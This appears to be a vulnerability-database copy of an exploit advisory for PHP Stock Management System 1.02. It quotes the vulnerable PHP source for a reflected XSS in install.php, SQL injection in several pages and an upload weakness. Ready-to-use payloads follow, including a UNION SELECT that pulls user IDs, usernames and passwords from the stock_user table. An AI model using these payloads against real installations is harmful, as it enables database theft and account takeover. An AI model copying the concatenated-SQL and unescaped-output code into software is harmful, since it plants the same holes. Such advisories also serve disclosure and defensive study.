PHP Stock Management System 1.02 - Multiple Vulnerabilty

2014-09-18T00:00:00
ID SSV:87263
Type seebug
Reporter Root
Modified 2014-09-18T00:00:00

Description

No description provided by source.

                                        
                                            
                                                # Exploit Title: PHP Stock Management System 1.02 - Multiple Vulnerabilty
# Date : 9-9-2014
# Author : jsass
​# Vendor Homepage: ​http://www.posnic.com/​
# Software Link:​ http://sourceforge.net/projects/stockmanagement/
# Version: ​1.02
# Tested on: kali linux
# Twitter : @KwSecurity
# Group : Q8 GRAY HAT TEAM
 
#########################################################################################################
 
 
 
XSS  install.php
 
code :
 
if(isset($_REQUEST['msg'])) {
                     
                    $msg=$_REQUEST['msg'];
                    echo "<p style=color:red>$msg</p>";                    
                }
 
 
exploit :
 
http://localhost/demo/POSNIC1.02DesignFix/install.php?msg=1%22%3E%3Cscript%3Ealert%28%27jsass%27%29%3C/script%3E
 
 
#########################################################################################################
 
SQL INJECTION : stock.php
 
code :
 
 
include_once("init.php");
$q = strtolower($_GET["q"]);
if (!$q) return;
$db->query("SELECT * FROM stock_avail where quantity >0 ");
  while ($line = $db->fetchNextObject()) {
   
    if (strpos(strtolower($line->name), $q) !== false) {
        echo "$line->name\n";
     
 }
 }
 
 
exploit :
 
 
localhost/demo/POSNIC1.02DesignFix/stock.php?q=2(inject)
 
 
#########################################################################################################
SQL INJECTION : view_customers.php
 
 
 
 
code :
 
$SQL = "SELECT * FROM  customer_details";
if(isset($_POST['Search']) AND trim($_POST['searchtxt'])!="")
{
 
$SQL = "SELECT * FROM  customer_details WHERE customer_name  LIKE '%".$_POST['searchtxt']."%' OR customer_address LIKE '%".$_POST['searchtxt']."%' OR customer_contact1 LIKE '%".$_POST['searchtxt']."%' OR customer_contact1 LIKE '%".$_POST['searchtxt']."%'";
 
 
}
 
 
 
 
 
exploit  :
 
 
http://localhost/demo/POSNIC1.02DesignFix/view_customers.php
 
POST
 
searchtxt=1(inject)&Search=Search
 
searchtxt=-1' /*!UNION*/ /*!SELECT*/ 1,/*!12345CONCAT(id,0x3a,username,0x3a,password)*/,3,4,5,6+from stock_user-- -&Search=Search
#########################################################################################################
 
 
SQL INJECTION : view_product.php
 
code :
 
if(isset($_GET['limit']) && is_numeric($_GET['limit'])){
    $limit=$_GET['limit'];
        $_GET['limit']=10;
}
 
    $page = $_GET['page'];
 
 
    if($page)
 
        $start = ($page - 1) * $limit;          //first item to display on this page
 
    else
 
        $start = 0;                             //if no page var is given, set start to 0
 
     
 
    /* Get data. */
 
    $sql = "SELECT * FROM stock_details LIMIT $start, $limit ";
    if(isset($_POST['Search']) AND trim($_POST['searchtxt'])!="")
{
 
    $sql= "SELECT * FROM  stock_details WHERE stock_name LIKE '%".$_POST['searchtxt']."%' OR stock_id LIKE '%".$_POST['searchtxt']."%' OR supplier_id LIKE '%".$_POST['searchtxt']."%' OR date LIKE '%".$_POST['searchtxt']."%'  LIMIT $start, $limit";
 
 
}
 
 
    $result = mysql_query($sql);
 
 
 
exploit :
 
localhost/demo/POSNIC1.02DesignFix/view_product.php?page=1&limit=1(inject)
and
 
localhost/demo/POSNIC1.02DesignFix/view_product.php
post
searchtxt=a(inject)&Search=Search
 
 
 
 
#########################################################################################################
 
UPLOAD :  logo_set.php
 
code :
 
<?php if(isset($_POST['submit'])){
     
$allowedExts = array("gif", "jpeg", "jpg", "png");
$temp = explode(".", $_FILES["file"]["name"]);
$extension = end($temp);
if ((($_FILES["file"]["type"] == "image/gif")
|| ($_FILES["file"]["type"] == "image/png"))
&& ($_FILES["file"]["size"] < 20000)
&& in_array($extension, $allowedExts))
  {
  if ($_FILES["file"]["error"] > 0)
    {
    echo "Return Code: " . $_FILES["file"]["error"] . "<br>";
    }
  else
    {
    $upload= $_FILES["file"]["name"] ;
    $type=$_FILES["file"]["type"];
 
 
 
 
 
 
exploit :
 
http://localhost/demo/POSNIC1.02DesignFix/logo_set.php
#########################################################################################################
 
 
 
AND MORE BUGS
 
Bye
 
#########################################################################################################
 
 
Great's : Nu11Byt3 , dzkabyle , Massacreur , Ze3r0Six , Hannibal , OrPh4ns , rDNix , OxAlien , Dead HackerZ , Somebody Knight
 
sec4ever.com & alm3refh.com
 
#########################################################################################################